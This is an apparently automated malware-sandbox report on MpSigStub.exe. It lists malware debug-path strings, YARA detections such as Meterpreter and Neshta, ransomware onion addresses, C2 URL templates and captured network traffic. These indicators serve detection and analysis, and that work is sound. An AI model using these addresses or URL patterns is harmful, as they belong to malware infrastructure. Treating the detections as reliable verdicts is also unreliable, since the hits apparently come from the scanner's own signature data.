    Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
    Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp
    Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: dsquery.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
    Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp
    Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
    Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
    Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp
    Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
    Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
    Source: Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
    Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
    Source: Binary string: subst.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp
    Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
    Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
    Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
    Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
    Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp
    Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
    Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
    Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
    Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
    Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
    Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp
    Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
    Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp
    Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
    Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
    Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
    Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
    Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
    Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
    Source: Binary string: reg.pdbd source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
    Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
    Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp
    Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: .+:\\.+\\.*Pedro\\.*PH_Secret_Application.*\\PH_Secret_Application.*\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
    Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
    Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: @.pdb source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp
    Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
    Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
    Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
    Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
    Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp
    Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmp
    Source: Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
    Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
    Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp
    Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
    Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: \ransom.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
    Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
    Source: Binary string: PELoader.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
    Source: Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
    Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
    Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp
    Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp
    Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
    Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
    Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
    Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp
    Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
    Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
    Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: hal.pdb source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp
    Source: Binary string: JOe|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: \mspass.pdb source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp
    Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
    Source: Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
    Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
    Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp
    Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
    Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
    Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp
    Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
    Source: Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
    Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
    Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp
    Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
    Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
    Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp
    Source: Binary string: advapi32.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
    Source: Binary string: ZAService.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
    Source: Binary string: gMolq.pdb source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp
    Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
    Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp
    Source: Binary string: RamMap.pdb source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp
    Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
    Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
    Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
    Source: Binary string: rpcss.pdb source: MpSigStub.exe, 00000023.00000003.6312714800.0000028BD7136000.00000004.00000001.sdmp
    Source: Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp
    Source: Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
    Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
    Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
    Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: sdmf|er.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
    Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
    Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
    Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
    Source: Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
    Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
    Source: Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
    Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp
    Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
    Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
    Source: Binary string: irprops.pdbj source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp

    Spreading:

    Yara detected Neshta
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Autohotkey Downloader Generic
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe, File opened: C:\Windows\SERVIC~1\NETWOR~1\
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe, File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe, File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe, File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe, File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe, File opened: C:\Windows\SERVIC~1\

    Networking:

    Yara detected PasteDownloader
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Meterpreter
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    C2 URLs / IPs found in malware configuration
    Found Tor onion address
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, String found in binary or memory: http://babukq4e2p4wu4iq.onion
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp, String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp, String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, String found in binary or memory: Open link in tor browser: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, String found in binary or memory: torlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, String found in binary or memory: Qtorlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
    Source: Joe Sandbox View, IP Address: 188.93.227.195
    Source: global traffic, TCP traffic: 192.168.11.20:49795 -> 188.93.227.195:587
    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko; Host: drive.google.com; Cache-Control: no-cache
    Source: global traffic, HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6kikngnm2hs1ehcuq6imn5jtp3/1634049300000/00014782062933200622/*/1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u?e=download HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko; Cache-Control: no-cache; Host: doc-00-88-docs.googleusercontent.com; Connection: Keep-Alive
    Source: Joe Sandbox View, ASN Name: CLARANET-ASClaraNETLTDGB
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&langad
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://%s/banner3.php?q=%d.%d.%d.%d.%d.%s.1.%d.%d
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://%s/block.phpa
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://%s/buy_online.php
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://%s/buy_online.phpa
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://%s/dupe.php?q=%d.%d.%d.%d.%d.%s.1.%d
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://%s/features.php
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpString found in binary or memory: http://%s/ftp/g.php
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://%s/go.php?gcode=%s
    Source: MpSigStub.exe, 00000023.00000003.6265552946.0000028BD779A000.00000004.00000001.sdmpString found in binary or memory: http://%s/httpss/setup.php?action=4&mk=%s&aid=%s
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://%s/in.php
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://%s/index.htm?content=%s&id=%d
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://%s/index.htm?id=%4d&content=%s
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%d
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%dxL
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://%s/inspection.aspx?index=stripbooks
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://%s/jbinfo.cgi?%s:%d
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://%s/js.php?affid=%s&kw=%s
    Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmpString found in binary or memory: http://%s/js3.php?kws=%%s&q=%%s&%%s
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpString found in binary or memory: http://%s/kx.php
    Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmpString found in binary or memory: http://%s/live.php?backupquery=%s
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://%s/loads.php
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://%s/loads2.php?r=%s
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://%s/mirror/ret.aspx?content=%s
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpString found in binary or memory: http://%s/poiehrgb.php?&advid=0000
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpString found in binary or memory: http://%s/search/search.cgi?s
